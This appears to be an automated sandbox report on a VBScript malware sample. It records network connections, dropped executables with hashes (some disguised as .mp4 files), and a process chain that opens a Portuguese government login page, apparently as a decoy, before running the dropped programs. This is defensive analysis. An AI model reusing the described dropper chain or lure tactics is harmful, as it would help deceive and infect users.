Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownHTTPS traffic detected: 16.12.9.14:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:50244 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: Joe Sandbox ViewDropped File: C:\Intrumental\lspcv2.exe FC8EF9246E4D3804573FA486B0C29CE6F795CA06CFCA36B61F2248E9A4C5FF7A
Source: Joe Sandbox ViewDropped File: C:\Intrumental\place.exe 7036468E471E0432E12A7736867FC03ED3A7283877296E7ECFC7B8C2CF91F258
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Termos\artigo.exe 648BDF024A96BEEEBCC3D1936755753D984D787F8354A7B45DB8FFF3700DC02D
Source: guia_luqf.vbsInitial sample: Strings found which are bigger than 50
Source: artigo.exe.0.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: place.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: lspcv2.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: alphaville[1].mp4.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: basketchampion[1].mp4.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: artigo.exe.0.drStatic PE information: Number of sections : 12 > 10
Source: alphaville[1].mp4.5.drStatic PE information: Number of sections : 12 > 10
Source: basketchampion[1].mp4.5.drStatic PE information: Number of sections : 12 > 10
Source: place.exe.5.drStatic PE information: Number of sections : 12 > 10
Source: lspcv2.exe.5.drStatic PE information: Number of sections : 12 > 10
Source: classification engineClassification label: mal88.evad.winVBS@26/72@18/11
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs"
Source: C:\Users\Public\Termos\artigo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Termos\artigo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Termos\artigo.exe "C:\users\public\Termos\artigo.exe"
Source: C:\Users\Public\Termos\artigo.exeProcess created: C:\Intrumental\place.exe c:\Intrumental\place.exe
Source: C:\Users\Public\Termos\artigo.exeProcess created: C:\Intrumental\lspcv2.exe c:\Intrumental\lspcv2.exe
Source: unknownProcess created: C:\Intrumental\place.exe "C:\Intrumental\place.exe"
Source: unknownProcess created: C:\Intrumental\lspcv2.exe "C:\Intrumental\lspcv2.exe"
Source: unknownProcess created: C:\Intrumental\place.exe "C:\Intrumental\place.exe"
Source: unknownProcess created: C:\Intrumental\lspcv2.exe "C:\Intrumental\lspcv2.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Termos\artigo.exe "C:\users\public\Termos\artigo.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
